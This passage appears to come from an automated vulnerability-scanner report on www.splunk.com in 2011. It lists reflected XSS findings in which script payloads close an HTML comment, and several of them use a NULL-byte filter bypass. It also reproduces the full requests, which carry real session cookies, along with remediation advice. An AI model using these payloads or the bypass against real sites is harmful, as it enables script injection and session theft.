__kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:35:20 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18340
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into an HTML comment. The payload %0088885--><script>alert(1)</script>01d4ba0ba72 was submitted in the REST URL parameter 4. This input was echoed as 88885--><script>alert(1)</script>01d4ba0ba72 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /page/securelink/signup/Splunk_Executive_Brief%0088885--><script>alert(1)</script>01d4ba0ba72 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 1 is copied into an HTML comment. The payload 34cda--><script>alert(1)</script>d78e48f3c63 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page34cda--><script>alert(1)</script>d78e48f3c63/securelink/signup/Splunk_Product_Datasheet HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload 8a3fb--><script>alert(1)</script>e6d68dbfae3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/securelink8a3fb--><script>alert(1)</script>e6d68dbfae3/signup/Splunk_Product_Datasheet HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:35:20 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18348
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into an HTML comment. The payload %00cf113--><script>alert(1)</script>dde257ca350 was submitted in the REST URL parameter 4. This input was echoed as cf113--><script>alert(1)</script>dde257ca350 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /page/securelink/signup/Splunk_Product_Datasheet%00cf113--><script>alert(1)</script>dde257ca350 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 1 is copied into an HTML comment. The payload 5f1c8--><script>alert(1)</script>3cece97f3e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page5f1c8--><script>alert(1)</script>3cece97f3e5/securelink/signup/Splunk_and_MapReduce HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload 79b44--><script>alert(1)</script>119459f7b61 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/securelink79b44--><script>alert(1)</script>119459f7b61/signup/Splunk_and_MapReduce HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:35:20 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18332
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into an HTML comment. The payload %00a4177--><script>alert(1)</script>949938b3cf9 was submitted in the REST URL parameter 4. This input was echoed as a4177--><script>alert(1)</script>949938b3cf9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /page/securelink/signup/Splunk_and_MapReduce%00a4177--><script>alert(1)</script>949938b3cf9 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 1 is copied into an HTML comment. The payload 95c21--><script>alert(1)</script>e51e3e95e1f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page95c21--><script>alert(1)</script>e51e3e95e1f/securelink/signup/The_Guide_to_Splunk_and_Operational_Intelligence HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:34:43 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 23:04:43 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 23:04:43 GMT; path=/ ETag: f886534d84f3ba63e0ac405582532abf1296945283 Last-Modified: Sat, 05 Feb 2011 22:34:43 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18555
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload a4001--><script>alert(1)</script>b8a20fe60f9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/securelinka4001--><script>alert(1)</script>b8a20fe60f9/signup/The_Guide_to_Splunk_and_Operational_Intelligence HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:35:08 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18444
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into an HTML comment. The payload %003e830--><script>alert(1)</script>55ffcb1368b was submitted in the REST URL parameter 4. This input was echoed as 3e830--><script>alert(1)</script>55ffcb1368b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /page/securelink/signup/The_Guide_to_Splunk_and_Operational_Intelligence%003e830--><script>alert(1)</script>55ffcb1368b HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942930878168; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=k9q26g5j81mb2osf77dbi672t5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 1 is copied into an HTML comment. The payload 8335f--><script>alert(1)</script>bf8267006b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page8335f--><script>alert(1)</script>bf8267006b1/securityportal HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:13:05 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:43:05 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:43:05 GMT; path=/ ETag: f9abaac05eff4ad22cd20a13d72af1311296943986 Last-Modified: Sat, 05 Feb 2011 22:13:06 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18347
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 813b2--><script>alert(1)</script>84a6bb363c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
